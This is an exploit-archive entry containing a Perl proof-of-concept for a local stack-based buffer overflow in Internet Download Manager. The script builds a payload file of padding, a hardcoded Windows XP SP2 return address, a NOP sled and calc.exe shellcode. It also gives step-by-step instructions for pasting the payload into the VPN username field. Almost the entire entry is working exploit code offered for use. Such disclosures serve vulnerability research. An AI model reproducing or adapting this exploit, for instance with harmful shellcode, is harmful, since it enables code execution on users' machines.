Internet Download Manager Buffer Overflow

2012-09-13T00:00:00
ID PACKETSTORM:116529
Type packetstorm
Reporter Dark-Puzzle
Modified 2012-09-13T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
# 0 _ __ __ __ 1  
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
# 1 \ \____/ >> Exploit database separated by exploit 0  
# 0 \/___/ type (local, remote, DoS, etc.) 1  
# 1 1  
# 0 [x] Official Website: http://www.1337day.com 0  
# 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1  
# 0 0  
# 1 ========================================== 1  
# 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0  
# 0 1  
# 1 dark-puzzle[at]live[at]fr 0  
# 0 ========================================== 1  
# 1 White Hat 1  
# 0 Independant Pentester 0  
# 1 exploit coder/bug researcher 0  
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1  
# Title : Internet Download Manager All Versions - Stack Based Buffer Overflow Vulnerability.  
# Author : Dark-Puzzle (Souhail Hammou)  
# Type : Local   
# Risk : Critical  
# Vendor : Tonec Inc.  
# Versions : All versions of IDM are Vulnerable .  
# Tested On : Windows XP Service Pack 2 FR 32-bits .  
# Date : 14 September 2012  
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...  
  
  
#Usage : Copy this script to idman.pl  
#Execute : perl idman.pl  
#Go to the file bof.txt , Select ALL , then Copy .  
# After copying the whole line Go To Downloads ---> Options ----> Dial up / VPN ----> paste the line into the username field and let the password field blank then click Enter .  
#French Version : Go to : Telechargement ---> Options ---> Internet ---> then Copy The Whole line from bof.txt and paste it into the username field and let the password field blank then click Enter .  
  
# BETTER COPY THE CONTENT OF THE FILE USING NOTEPAD++  
  
# Bingo ! Calc.exe will show up (P.S : If you're using other that WinXP SP2 Fr you'll have to change the return address with the compatible one with your system )  
  
  
my $junk = "A" x 2313 ;  
my $eip = "\x5D\x38\x82\x7C" ; # For WinXP SP2 Only .  
my $nops = "\x90" x 5 ;  
my $shellcode =   
# Calc.exe Shellcode (19 bytes)  
"\xeB\x02\xBA\xC7\x93".  
"\xBF\x77\xFF\xD2\xCC".  
"\xE8\xF3\xFF\xFF\xFF".  
"\x63\x61\x6C\x63";  
  
  
$payload= $junk.$eip.$nops.$shellcode;  
open(myfile,'>bof.txt');  
print myfile $payload;  
close(myfile);  
print "Wrote ".length($payload)." bytes\n";  
  
#Datasec Team .  
  
  
`